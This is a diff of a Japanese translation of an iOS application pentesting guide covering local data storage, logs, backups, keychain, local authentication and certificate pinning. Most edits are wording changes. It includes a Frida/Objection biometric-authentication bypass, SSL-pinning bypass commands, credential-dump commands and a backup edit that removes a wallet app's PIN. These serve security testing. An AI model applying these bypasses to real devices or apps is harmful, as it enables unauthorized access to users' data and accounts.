-[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) は、アプリケーション内のオブジェクトのモデル層を管理するためのフレームワークです。[Core DataはSQLiteを永続ストアとして使用できます](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/)、しかしフレームワーク自体はデータベースではありません。\
-CoreDataはデフォルトでデータを暗号化しません。ただし、CoreDataに追加の暗号化レイヤーを追加することができます。詳細については、[GitHub Repo](https://github.com/project-imas/encrypted-core-data)を参照してください。
+[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) は、アプリケーション内のオブジェクトのモデル層を管理するためのフレームワークです。[Core Data は SQLite を永続ストアとして使用できます](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/)、しかしフレームワーク自体はデータベースではありません。\
+CoreData はデフォルトでデータを暗号化しません。ただし、CoreData に追加の暗号化レイヤーを追加することができます。詳細については、[GitHub Repo](https://github.com/project-imas/encrypted-core-data) を参照してください。
 
-アプリケーションのSQLite Core Data情報は、パス `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` にあります。
+アプリケーションの SQLite Core Data 情報は、パス `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` にあります。
 
-**SQLiteを開いて機密情報にアクセスできる場合、設定ミスを見つけたことになります。**
+**SQLite を開いて機密情報にアクセスできる場合、設定ミスを見つけたことになります。**
 ```objectivec:Code from iGoat
 -(void)storeDetails {
 AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate);
@@ -433,20 +433,21 @@ NSLog(@"data stored in core data");
 ```
 ### YapDatabase
 
-[YapDatabase](https://github.com/yapstudios/YapDatabase) は、SQLiteの上に構築されたキー/バリューストアです。\
+[YapDatabase](https://github.com/yapstudios/YapDatabase)は、SQLiteの上に構築されたキー/バリューストアです。\
 Yapデータベースはsqliteデータベースであるため、前のセクションで提案されたコマンドを使用して見つけることができます。
 
 ### Other SQLite Databases
 
-アプリケーションが独自のsqliteデータベースを作成することは一般的です。これらは**機密** **データ**を**保存**しており、暗号化されていない場合があります。したがって、アプリケーションディレクトリ内のすべてのデータベースを確認することは常に興味深いです。したがって、データが保存されているアプリケーションディレクトリに移動します(`/private/var/mobile/Containers/Data/Application/{APPID}`)
+アプリケーションが独自のsqliteデータベースを作成することは一般的です。これらは**機密** **データ**を**保存**しており、暗号化されていない可能性があります。したがって、アプリケーションディレクトリ内のすべてのデータベースを確認することは常に興味深いです。データが保存されているアプリケーションディレクトリに移動してください(`/private/var/mobile/Containers/Data/Application/{APPID}`)。
 ```bash
 find ./ -name "*.sqlite" -or -name "*.db"
 ```
 ### Firebase Real-Time Databases
 
-開発者は、Firebase Real-Time Databasesを通じて**データを保存および同期**することができる**NoSQLクラウドホストデータベース**を利用できます。データはJSON形式で保存され、接続されたすべてのクライアントにリアルタイムで同期されます。
+開発者は、Firebase Real-Time Databasesを通じて**データを保存および同期**することができる**NoSQLクラウドホストデータベース**を利用できます。データはJSON形式で保存され、リアルタイムで接続されたすべてのクライアントに同期されます。
+
+Firebaseデータベースの設定ミスを確認する方法は、こちらで確認できます:
 
-誤って構成されたFirebaseデータベースを確認する方法は、こちらで見つけることができます:
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -456,7 +457,7 @@ find ./ -name "*.sqlite" -or -name "*.db"
 
 [Realm Objective-C](https://realm.io/docs/objc/latest/)および[Realm Swift](https://realm.io/docs/swift/latest/)は、Appleが提供していないデータストレージの強力な代替手段を提供します。デフォルトでは、**データは暗号化されずに保存**され、特定の設定を通じて暗号化が可能です。
 
-データベースは次の場所にあります:`/private/var/mobile/Containers/Data/Application/{APPID}`。これらのファイルを探索するには、次のようなコマンドを利用できます:
+データベースは次の場所にあります: `/private/var/mobile/Containers/Data/Application/{APPID}`。これらのファイルを探索するには、次のようなコマンドを利用できます:
 ```bash
 iPhone:/private/var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents root# ls
 default.realm  default.realm.lock  default.realm.management/  default.realm.note|
@@ -479,7 +480,7 @@ fatalError("Error opening realm: \(error)")
 ```
 ### Couchbase Lite Databases
 
-[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) は、**軽量**で**組み込み**のデータベースエンジンとして説明されており、**ドキュメント指向**(NoSQL)アプローチに従っています。**iOS**および**macOS**にネイティブに設計されており、データをシームレスに同期する機能を提供します。
+[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) は、**軽量**で**組み込み型**のデータベースエンジンであり、**ドキュメント指向**(NoSQL)アプローチに従っています。**iOS**および**macOS**にネイティブに設計されており、データをシームレスに同期する機能を提供します。
 
 デバイス上の潜在的なCouchbaseデータベースを特定するには、次のディレクトリを検査する必要があります:
 ```bash
@@ -487,10 +488,10 @@ ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application S
 ```
 ### Cookies
 
-iOSは各アプリのフォルダ内の**`Library/Cookies/cookies.binarycookies`**にアプリのクッキーを保存します。しかし、開発者は時々、**バックアップでアクセスできるため、**それらを**keychain**に保存することを決定します。
+iOSはアプリのクッキーを各アプリのフォルダ内の**`Library/Cookies/cookies.binarycookies`**に保存します。しかし、開発者は時々、**バックアップでアクセス可能なため、クッキーをkeychainに保存することを決定します**。
 
 クッキーファイルを検査するには、[**このpythonスクリプト**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser)を使用するか、objectionの**`ios cookies get`**を使用できます。\
-**また、objectionを使用して**これらのファイルをJSON形式に変換し、データを検査することもできます。
+**また、objectionを使用して** これらのファイルをJSON形式に変換し、データを検査することもできます。
 ```bash
 ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
 [
@@ -508,9 +509,9 @@ iOSは各アプリのフォルダ内の**`Library/Cookies/cookies.binarycookies`
 ```
 ### Cache
 
-デフォルトでは、NSURLSessionは**Cache.db**データベースに**HTTPリクエストとレスポンス**などのデータを保存します。このデータベースには、トークン、ユーザー名、またはその他の機密情報がキャッシュされている場合、**機密データ**が含まれる可能性があります。キャッシュされた情報を見つけるには、アプリのデータディレクトリ(`/var/mobile/Containers/Data/Application/`)を開き、`/Library/Caches/`に移動します。**WebKitキャッシュもCache.db**ファイルに保存されています。**Objection**は、`sqlite connect Cache.db`コマンドを使用してデータベースを開いて操作できます。これは**通常のSQLiteデータベース**です。
+デフォルトでは、NSURLSessionは**Cache.db**データベースに**HTTPリクエストとレスポンス**などのデータを保存します。このデータベースには、トークン、ユーザー名、またはその他の**機密情報**がキャッシュされている場合、**機密データ**が含まれる可能性があります。キャッシュされた情報を見つけるには、アプリのデータディレクトリ(`/var/mobile/Containers/Data/Application/`)を開き、`/Library/Caches/`に移動します。**WebKitキャッシュもCache.db**ファイルに保存されています。**Objection**は、`sqlite connect Cache.db`コマンドを使用してデータベースを開いて操作できます。これは**通常のSQLiteデータベース**です。
 
-このデータのキャッシングを無効にすることを**推奨**します。リクエストまたはレスポンスに機密情報が含まれている可能性があるためです。以下のリストは、これを達成するためのさまざまな方法を示しています。
+このデータのキャッシングを**無効にすることを推奨**します。リクエストやレスポンスに機密情報が含まれている可能性があるためです。以下のリストは、これを達成するためのさまざまな方法を示しています。
 
 1. ログアウト後にキャッシュされたレスポンスを削除することを推奨します。これは、Appleが提供する[`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses)メソッドを使用して行うことができます。このメソッドは次のように呼び出すことができます:
 
@@ -532,9 +533,9 @@ iOSは各アプリのフォルダ内の**`Library/Cookies/cookies.binarycookies`
 
 iPhoneが脱獄されていない限り、**攻撃者**はこれらのスクリーンショットを見るために**デバイス**に**アクセス**する必要があります。デフォルトでは、最後のスナップショットはアプリケーションのサンドボックス内の`Library/Caches/Snapshots/`または`Library/SplashBoard/Snapshots`フォルダーに保存されます(信頼されたコンピュータはiOS 7.0以降からファイルシステムにアクセスできません)。
 
-この悪影響を防ぐ方法の1つは、`ApplicationDidEnterBackground()`関数を使用してスナップショットを取得する前に、空白の画面を表示するか、機密データを削除することです。
+この悪影響を防ぐ方法の一つは、`ApplicationDidEnterBackground()`関数を使用してスナップショットを取得する前に空白の画面を表示するか、機密データを削除することです。
 
-以下は、デフォルトのスクリーンショットを設定するサンプル修正方法です。
+以下は、デフォルトのスクリーンショットを設定するサンプルの修正方法です。
 
 Swift:
 ```swift
@@ -566,7 +567,7 @@ self.backgroundImage.bounds = UIScreen.mainScreen.bounds;
 [self.backgroundImage removeFromSuperview];
 }
 ```
-これは、アプリケーションがバックグラウンドに入るときに `overlayImage.png` を背景画像として設定します。これにより、`overlayImage.png` が常に現在のビューを上書きするため、機密データの漏洩を防ぎます。
+これは、アプリケーションがバックグラウンドに移行するたびに背景画像を `overlayImage.png` に設定します。これにより、`overlayImage.png` が常に現在のビューを上書きするため、機密データの漏洩を防ぎます。
 
 ### Keychain
 
@@ -574,22 +575,22 @@ iOSキーチェーンにアクセスし管理するためのツールとして
 
 #### **資格情報の保存**
 
-**NSURLCredential** クラスは、NSUserDefaultsや他のラッパーをバイパスして、機密情報を直接キーチェーンに保存するのに最適です。ログイン後に資格情報を保存するために、以下のSwiftコードが使用されます:
+**NSURLCredential** クラスは、NSUserDefaultsや他のラッパーをバイパスして、機密情報を直接キーチェーンに保存するのに最適です。ログイン後に資格情報を保存するために、次のSwiftコードが使用されます:
 ```swift
 NSURLCredential *credential;
 credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent];
 [[NSURLCredentialStorage sharedCredentialStorage] setCredential:credential forProtectionSpace:self.loginProtectionSpace];
 ```
-これらの保存された資格情報を抽出するために、Objectionのコマンド `ios nsurlcredentialstorage dump` が利用されます。
+これらの保存された認証情報を抽出するために、Objectionのコマンド `ios nsurlcredentialstorage dump` が利用されます。
 
 ## **カスタムキーボードとキーボードキャッシュ**
 
-iOS 8.0以降、ユーザーはカスタムキーボード拡張をインストールでき、これは **設定 > 一般 > キーボード > キーボード** で管理できます。これらのキーボードは機能が拡張されますが、キー入力のログを記録し、外部サーバーにデータを送信するリスクがあります。ただし、ネットワークアクセスを必要とするキーボードについてはユーザーに通知されます。アプリは、機密情報の入力にカスタムキーボードの使用を制限するべきです。
+iOS 8.0以降、ユーザーはカスタムキーボード拡張をインストールでき、これは **設定 > 一般 > キーボード > キーボード** で管理できます。これらのキーボードは機能が拡張されますが、キー入力のログを記録し、外部サーバーにデータを送信するリスクがあります。ただし、ネットワークアクセスを必要とするキーボードについてはユーザーに通知されます。アプリは、機密情報の入力に対してカスタムキーボードの使用を制限するべきです。
 
 **セキュリティ推奨事項:**
 
 - セキュリティを強化するために、サードパーティ製キーボードを無効にすることが推奨されます。
-- デフォルトのiOSキーボードの自動修正および自動提案機能に注意してください。これにより、`Library/Keyboard/{locale}-dynamic-text.dat` または `/private/var/mobile/Library/Keyboard/dynamic-text.dat` にあるキャッシュファイルに機密情報が保存される可能性があります。これらのキャッシュファイルは、機密データのために定期的にチェックする必要があります。キャッシュデータをクリアするために、**設定 > 一般 > リセット > キーボード辞書をリセット** でキーボード辞書をリセットすることが推奨されます。
+- デフォルトのiOSキーボードの自動修正および自動提案機能に注意してください。これにより、`Library/Keyboard/{locale}-dynamic-text.dat` または `/private/var/mobile/Library/Keyboard/dynamic-text.dat` に保存された機密情報がキャッシュファイルに格納される可能性があります。これらのキャッシュファイルは、機密データのために定期的にチェックする必要があります。キャッシュデータをクリアするために、**設定 > 一般 > リセット > キーボード辞書をリセット** することが推奨されます。
 - ネットワークトラフィックを傍受することで、カスタムキーボードがリモートでキー入力を送信しているかどうかを確認できます。
 
 ### **テキストフィールドキャッシュの防止**
@@ -606,13 +607,13 @@ textField.autocorrectionType = UITextAutocorrectionTypeNo;
 ```
 ## **ログ**
 
-コードのデバッグにはしばしば**ロギング**が使用されます。**ログには機密情報が含まれる可能性があるため、リスクが伴います**。以前は、iOS 6およびそれ以前のバージョンでは、ログはすべてのアプリにアクセス可能であり、機密データの漏洩のリスクがありました。**現在、アプリケーションは自分のログのみへのアクセスに制限されています**。
+コードのデバッグには、**ロギング**の使用がよく含まれます。**ログには機密情報が含まれる可能性があるため、リスクが伴います**。以前は、iOS 6およびそれ以前のバージョンでは、ログはすべてのアプリがアクセス可能であり、機密データの漏洩のリスクがありました。**現在、アプリケーションは自分のログのみへのアクセスに制限されています**。
 
-これらの制限にもかかわらず、**ロック解除されたデバイスに物理的にアクセスできる攻撃者**は、デバイスをコンピュータに接続して**ログを読み取る**ことでこれを悪用することができます。アプリがアンインストールされた後でも、ログはディスク上に残ることに注意が必要です。
+これらの制限にもかかわらず、**ロック解除されたデバイスに物理的にアクセスできる攻撃者**は、デバイスをコンピュータに接続して**ログを読み取る**ことでこれを悪用することができます。アプリがアンインストールされた後も、ログはディスク上に残ることに注意が必要です。
 
 リスクを軽減するために、**アプリと徹底的に対話し**、すべての機能や入力を探索して、機密情報が意図せずログに記録されていないことを確認することが推奨されます。
 
-アプリのソースコードをレビューして潜在的な漏洩を探す際には、`NSLog`、`NSAssert`、`NSCAssert`、`fprintf`などのキーワードを使用して**定義済み**および**カスタムロギングステートメント**の両方を探してください。また、カスタム実装のための`Logging`や`Logfile`の言及も確認してください。
+アプリのソースコードをレビューして潜在的な漏洩を探す際には、`NSLog`、`NSAssert`、`NSCAssert`、`fprintf`などのキーワードを使用して、**事前定義された**および**カスタムロギングステートメント**の両方を探してください。また、カスタム実装のための`Logging`や`Logfile`の言及も確認してください。
 
 ### **システムログの監視**
 
@@ -621,20 +622,20 @@ textField.autocorrectionType = UITextAutocorrectionTypeNo;
 idevice_id --list   # To find the device ID
 idevicesyslog -u  (| grep )   # To capture the device logs
 ```
-役立ちます。さらに、**Xcode** はコンソールログを収集する方法を提供します:
+役立ちます。さらに、**Xcode**はコンソールログを収集する方法を提供します:
 
 1. Xcodeを開きます。
 2. iOSデバイスを接続します。
 3. **ウィンドウ** -> **デバイスとシミュレーター**に移動します。
 4. デバイスを選択します。
-5. 調査している問題を引き起こします。
+5. 調査している問題をトリガーします。
 6. **コンソールを開く**ボタンを使用して、新しいウィンドウでログを表示します。
 
 より高度なログ記録のために、デバイスシェルに接続し、**socat**を使用することでリアルタイムのログ監視が可能です:
 ```bash
 iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
 ```
-ログ活動を観察するためのコマンドに続いて、これは問題の診断やログ内の潜在的なデータ漏洩の特定に非常に役立ちます。
+ログ活動を観察するためのコマンドに続いて、これは問題の診断やログにおける潜在的なデータ漏洩の特定に非常に役立ちます。
 
 ## バックアップ
 
@@ -644,15 +645,15 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
 
 バックアップに**インストールされたアプリとそのデータ**が含まれることは、潜在的な**データ漏洩**の問題を引き起こし、**バックアップの変更がアプリの機能に影響を与えるリスク**をもたらします。これらのリスクを軽減するために、**アプリのディレクトリやそのサブディレクトリ内に機密情報をプレーンテキストで保存しないこと**が推奨されます。
 
-### バックアップからのファイル除外
+### バックアップからのファイルの除外
 
-`Documents/`および`Library/Application Support/`内のファイルはデフォルトでバックアップされます。開発者は、`NSURL setResourceValue:forKey:error:`を使用して特定のファイルやディレクトリをバックアップから除外することができます。これは、機密データがバックアップに含まれないように保護するために重要です。
+`Documents/`および`Library/Application Support/`内のファイルはデフォルトでバックアップされます。開発者は、`NSURL setResourceValue:forKey:error:`を使用して`NSURLIsExcludedFromBackupKey`で特定のファイルやディレクトリをバックアップから除外できます。この実践は、機密データがバックアップに含まれないように保護するために重要です。
 
 ### 脆弱性のテスト
 
-アプリのバックアップセキュリティを評価するには、まず**Finderを使用してバックアップを作成**し、次に[Appleの公式ドキュメント](https://support.apple.com/en-us/HT204215)のガイダンスに従ってそれを見つけます。バックアップ内の機密データやアプリの動作に影響を与える可能性のある設定を分析します。
+アプリのバックアップセキュリティを評価するには、まず**Finderを使用してバックアップを作成**し、次に[Appleの公式ドキュメント](https://support.apple.com/en-us/HT204215)のガイダンスに従ってそれを見つけます。バックアップを分析して、アプリの動作に影響を与える可能性のある機密データや設定を探します。
 
-機密情報は、コマンドラインツールや[ iMazing](https://imazing.com)のようなアプリケーションを使用して探し出すことができます。暗号化されたバックアップの場合、バックアップのルートにある"Manifest.plist"ファイル内の"IsEncrypted"キーを確認することで、暗号化の存在を確認できます。
+機密情報は、コマンドラインツールや[ iMazing](https://imazing.com)のようなアプリケーションを使用して探し出すことができます。暗号化されたバックアップの場合、バックアップのルートにある"Manifest.plist"ファイルの"IsEncrypted"キーを確認することで、暗号化の存在を確認できます。
 ```xml
 
 
@@ -669,7 +670,7 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock
 
 ### アプリの動作の変更
 
-バックアップの変更を通じてアプリの動作を変更する例として、[Bitherビットコインウォレットアプリ](https://github.com/bither/bither-ios)が示されています。このアプリでは、UIロックPINが**pin_code**キーの下に`net.bither.plist`内に保存されています。このキーをplistから削除し、バックアップを復元することで、PINの要求が解除され、制限のないアクセスが可能になります。
+バックアップの変更を通じてアプリの動作を変更する例は、[Bitherビットコインウォレットアプリ](https://github.com/bither/bither-ios)で示されており、UIロックPINは**pin_code**キーの下に`net.bither.plist`に保存されています。このキーをplistから削除し、バックアップを復元することで、PINの要求が解除され、制限のないアクセスが提供されます。
 
 ## 機密データのメモリテストに関する概要
 
@@ -687,7 +688,7 @@ $ strings memory > strings.txt
 # Extracting strings using rabin2
 $ rabin2 -ZZ memory > strings.txt
 ```
-より詳細な分析、特定のデータタイプやパターンの検索を含む、**radare2**は広範な検索機能を提供します:
+より詳細な分析、特定のデータタイプやパターンの検索を含むために、**radare2**は広範な検索機能を提供します:
 ```bash
 $ r2 
 [0x00000000]> /?
@@ -708,28 +709,28 @@ $ r2 frida://usb//
 
 ### Use of Insecure and/or Deprecated Algorithms
 
-開発者は、**deprecated algorithms**を使用して認証の**checks**を行ったり、データを**store**または**send**したりすべきではありません。これらのアルゴリズムには、RC4、MD4、MD5、SHA1などがあります。例えば、パスワードを保存するために**hashes**を使用する場合、ソルトを使用したハッシュのブルートフォース**resistant**なものを使用するべきです。
+開発者は、認証チェック、データの保存または送信を行うために**非推奨のアルゴリズム**を使用すべきではありません。これらのアルゴリズムには、RC4、MD4、MD5、SHA1などがあります。例えば、パスワードを保存するために**ハッシュ**を使用する場合、ソルトを使用したハッシュのブルートフォース**耐性**が必要です。
 
 ### Check
 
-主なチェックは、コード内に**hardcoded**パスワード/秘密が見つかるか、またはそれらが**predictable**であるか、コードが何らかの**weak** **cryptography**アルゴリズムを使用しているかを確認することです。
+主なチェックは、コード内に**ハードコーディングされた**パスワード/秘密があるか、またはそれらが**予測可能**であるか、コードが何らかの**弱い****暗号化**アルゴリズムを使用しているかを確認することです。
 
-**crypto** **libraries**を自動的に**monitor**できることを知っておくのは興味深いです。**objection**を使用して:
+興味深いことに、**objection**を使用して、いくつかの**crypto** **libraries**を自動的に**monitor**することができます。
 ```swift
 ios monitor crypt
 ```
-**iOSの暗号APIとライブラリに関する詳細情報**については、[https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography)にアクセスしてください。
+**iOSの暗号化APIおよびライブラリに関する詳細情報**については、[https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography)にアクセスしてください。
 
 ## ローカル認証
 
 **ローカル認証**は、特に暗号化手法を通じてリモートエンドポイントへのアクセスを保護する際に重要な役割を果たします。ここでの本質は、適切に実装されていない場合、ローカル認証メカニズムが回避される可能性があるということです。
 
-Appleの[**ローカル認証フレームワーク**](https://developer.apple.com/documentation/localauthentication)と[**キーチェーン**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)は、ユーザー認証ダイアログを促進し、秘密データを安全に処理するための堅牢なAPIを提供します。セキュアエンクレーブはTouch IDの指紋IDを保護し、Face IDは生体データを損なうことなく顔認識に依存します。
+Appleの[**ローカル認証フレームワーク**](https://developer.apple.com/documentation/localauthentication)と[**キーチェーン**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)は、ユーザー認証ダイアログを促進し、秘密データを安全に処理するための堅牢なAPIを開発者に提供します。セキュアエンクレーブはTouch IDの指紋IDを保護し、Face IDは生体データを損なうことなく顔認識に依存します。
 
 Touch ID/Face IDを統合するために、開発者は2つのAPIの選択肢があります:
 
-- **`LocalAuthentication.framework`**:生体データへのアクセスなしで高レベルのユーザー認証を提供します。
-- **`Security.framework`**:生体認証を使用して秘密データを保護するための低レベルのキーチェーンサービスへのアクセスを提供します。さまざまな[オープンソースラッパー](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id)がキーチェーンアクセスを簡素化します。
+- **`LocalAuthentication.framework`**:生体データへのアクセスなしで高レベルのユーザー認証を行います。
+- **`Security.framework`**:生体認証で秘密データを保護するための低レベルのキーチェーンサービスアクセスを提供します。さまざまな[オープンソースラッパー](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id)がキーチェーンアクセスを簡素化します。
 
 > [!CAUTION]
 > ただし、`LocalAuthentication.framework`と`Security.framework`の両方には脆弱性があり、主に認証プロセスのためにデータを送信せずにブール値を返すため、バイパスされる可能性があります(参照:[Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM))。
@@ -745,11 +746,11 @@ Touch ID/Face IDを統合するために、開発者は2つのAPIの選択肢が
 
 ### キーチェーンを使用したローカル認証
 
-iOSアプリでの**ローカル認証**の実装には、認証トークンなどの秘密データを安全に保存するために**キーチェーンAPI**を使用します。このプロセスにより、データはユーザーによってのみアクセスでき、デバイスのパスコードやTouch IDなどの生体認証を使用します。
+iOSアプリで**ローカル認証**を実装するには、**キーチェーンAPI**を使用して認証トークンなどの秘密データを安全に保存します。このプロセスにより、データはユーザーのデバイスのパスコードまたはTouch IDなどの生体認証を使用してのみアクセス可能になります。
 
-キーチェーンは、`SecAccessControl`属性を持つアイテムを設定する機能を提供し、ユーザーがTouch IDまたはデバイスのパスコードを介して成功裏に認証するまでアイテムへのアクセスを制限します。この機能はセキュリティを強化するために重要です。
+キーチェーンは、`SecAccessControl`属性を持つアイテムを設定する機能を提供し、ユーザーがTouch IDまたはデバイスのパスコードを介して成功裏に認証されるまでアイテムへのアクセスを制限します。この機能はセキュリティを強化するために重要です。
 
-以下は、SwiftとObjective-Cでのコード例で、これらのセキュリティ機能を活用してキーチェーンに文字列を保存および取得する方法を示しています。例は、Touch ID認証を要求するためのアクセス制御を設定し、データが設定されたデバイスでのみアクセス可能であることを保証する方法を具体的に示しています。
+以下は、SwiftおよびObjective-Cでのコード例で、これらのセキュリティ機能を活用してキーチェーンに文字列を保存および取得する方法を示しています。例は、Touch ID認証を要求するためのアクセス制御を設定し、データが設定されたデバイスでのみアクセス可能であることを保証する方法を具体的に示しています。
 
 {{#tabs}}
 {{#tab name="Swift"}}
@@ -876,22 +877,22 @@ NSLog(@"Something went wrong");
 
 ### 検出
 
-アプリ内でのフレームワークの使用は、アプリのバイナリの共有ダイナミックライブラリのリストを分析することで検出できます。これは `otool` を使用して行うことができます:
+アプリ内でのフレームワークの使用は、アプリのバイナリの共有動的ライブラリのリストを分析することで検出できます。これは `otool` を使用して行うことができます:
 ```bash
 $ otool -L .app/
 ```
-アプリで`LocalAuthentication.framework`が使用されている場合、出力には以下の2行が含まれます(`LocalAuthentication.framework`は内部で`Security.framework`を使用していることを忘れないでください):
+アプリで `LocalAuthentication.framework` が使用されている場合、出力には以下の2行が含まれます(`LocalAuthentication.framework` は内部で `Security.framework` を使用していることを忘れないでください):
 ```bash
 /System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication
 /System/Library/Frameworks/Security.framework/Security
 ```
-`Security.framework`が使用されている場合、2番目のもののみが表示されます。
+もし`Security.framework`が使用されている場合、2番目のものだけが表示されます。
 
 ### ローカル認証フレームワークバイパス
 
 #### **Objection**
 
-**Objection Biometrics Bypass**を通じて、**LocalAuthentication**メカニズムを克服するための技術が利用可能です。このアプローチの核心は、**Frida**を利用して`evaluatePolicy`関数を操作し、実際の認証成功に関係なく常に`True`の結果を返すようにすることです。これは、欠陥のある生体認証プロセスを回避するのに特に便利です。
+**Objection Biometrics Bypass**を通じて、[このGitHubページ](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass)にある技術が、**LocalAuthentication**メカニズムを克服するために利用可能です。このアプローチの核心は、**Frida**を利用して`evaluatePolicy`関数を操作し、実際の認証成功に関係なく常に`True`の結果を返すようにすることです。これは、欠陥のある生体認証プロセスを回避するのに特に便利です。
 
 このバイパスを有効にするために、次のコマンドが使用されます:
 ```bash
@@ -902,11 +903,11 @@ $ otool -L .app/
 (agent) [3mhtws9x47q] Marking OS response as True instead
 (agent) [3mhtws9x47q] Biometrics bypass hook complete
 ```
-このコマンドは、Objectionがタスクを登録し、`evaluatePolicy`チェックの結果を`True`に実質的に変更するシーケンスを引き起こします。
+このコマンドは、Objectionがタスクを登録し、`evaluatePolicy`チェックの結果を`True`に実質的に変更するシーケンスを開始します。
 
 #### Frida
 
-**`evaluatePolicy`**の使用例は、[DVIA-v2 application](https://github.com/prateek147/DVIA-v2)からです:
+**`evaluatePolicy`**の使用例は[DVIA-v2アプリケーション](https://github.com/prateek147/DVIA-v2)からです:
 ```swift
 +(void)authenticateWithTouchID {
 LAContext *myContext = [[LAContext alloc] init];
@@ -958,7 +959,7 @@ return result;
 console.log("Objective-C Runtime is not available!");
 }
 ```
-バイオメトリック認証をバイパスし、Fridaスクリプトを注入するには、次のコマンドを使用します:
+バイオメトリック認証をバイパスするためにFridaスクリプトを注入するには、次のコマンドを使用します:
 ```bash
 frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-ios.js
 ```
@@ -966,42 +967,49 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i
 
 ### カスタムURIハンドラー / ディープリンク / カスタムスキーム
 
+
 {{#ref}}
 ios-custom-uri-handlers-deeplinks-custom-schemes.md
 {{#endref}}
 
 ### ユニバーサルリンク
 
+
 {{#ref}}
 ios-universal-links.md
 {{#endref}}
 
 ### UIActivity共有
 
+
 {{#ref}}
 ios-uiactivity-sharing.md
 {{#endref}}
 
 ### UIPasteboard
 
+
 {{#ref}}
 ios-uipasteboard.md
 {{#endref}}
 
 ### アプリ拡張
 
+
 {{#ref}}
 ios-app-extensions.md
 {{#endref}}
 
 ### WebViews
 
+
 {{#ref}}
 ios-webviews.md
 {{#endref}}
 
 ### シリアライゼーションとエンコーディング
 
+
 {{#ref}}
 ios-serialisation-and-encoding.md
 {{#endref}}
@@ -1009,7 +1017,8 @@ ios-serialisation-and-encoding.md
 ## ネットワーク通信
 
 **暗号化なしで通信が行われていないこと**、またアプリケーションがサーバーの**TLS証明書を正しく検証していること**を確認することが重要です。\
-これらの問題を確認するために、**Burp**のようなプロキシを使用できます:
+これらの問題を確認するために、**Burp**のようなプロキシを使用できます:
+
 
 {{#ref}}
 burp-configuration-for-ios.md
@@ -1023,36 +1032,36 @@ TLS証明書を検証する一般的な問題の一つは、証明書が**信頼
 ### 証明書ピンニング
 
 アプリケーションがSSLピンニングを正しく使用している場合、アプリケーションは期待される証明書でのみ動作します。アプリケーションをテストする際に、**Burpは独自の証明書を提供するため、これが問題になることがあります。**\
-脱獄デバイス内でこの保護を回避するために、[**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2)をインストールするか、[**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device)をインストールできます。
+脱獄したデバイス内でこの保護を回避するために、[**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2)をインストールするか、[**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device)をインストールできます。
 
 また、**objectionの** `ios sslpinning disable`を使用することもできます。
 
 ## その他
 
-- **`/System/Library`**には、システムアプリケーションによって使用されるフレームワークがインストールされています。
-- App Storeからユーザーがインストールしたアプリケーションは、**`/User/Applications`**内にあります。
-- **`/User/Library`**には、ユーザーレベルのアプリケーションによって保存されたデータが含まれています。
-- **`/User/Library/Notes/notes.sqlite`**にアクセスして、アプリケーション内に保存されたノートを読むことができます。
+- **`/System/Library`** には、システムアプリケーションによって使用されるフレームワークがインストールされています。
+- App Storeからユーザーがインストールしたアプリケーションは、**`/User/Applications`** 内にあります。
+- **`/User/Library`** には、ユーザーレベルのアプリケーションによって保存されたデータが含まれています。
+- **`/User/Library/Notes/notes.sqlite`** にアクセスして、アプリケーション内に保存されたノートを読むことができます。
 - インストールされたアプリケーションのフォルダ内(**`/User/Applications//`**)には、いくつかの興味深いファイルがあります:
 - **`iTunesArtwork`**:アプリによって使用されるアイコン
 - **`iTunesMetadata.plist`**:App Storeで使用されるアプリの情報
-- **`/Library/*`**:設定やキャッシュが含まれています。**`/Library/Cache/Snapshots/*`**には、アプリケーションがバックグラウンドに送信される前に行われたスナップショットが含まれています。
+- **`/Library/*`**:設定とキャッシュが含まれています。**`/Library/Cache/Snapshots/*`** には、アプリケーションをバックグラウンドに送信する前に行われたスナップショットが含まれています。
 
 ### ホットパッチ/強制更新
 
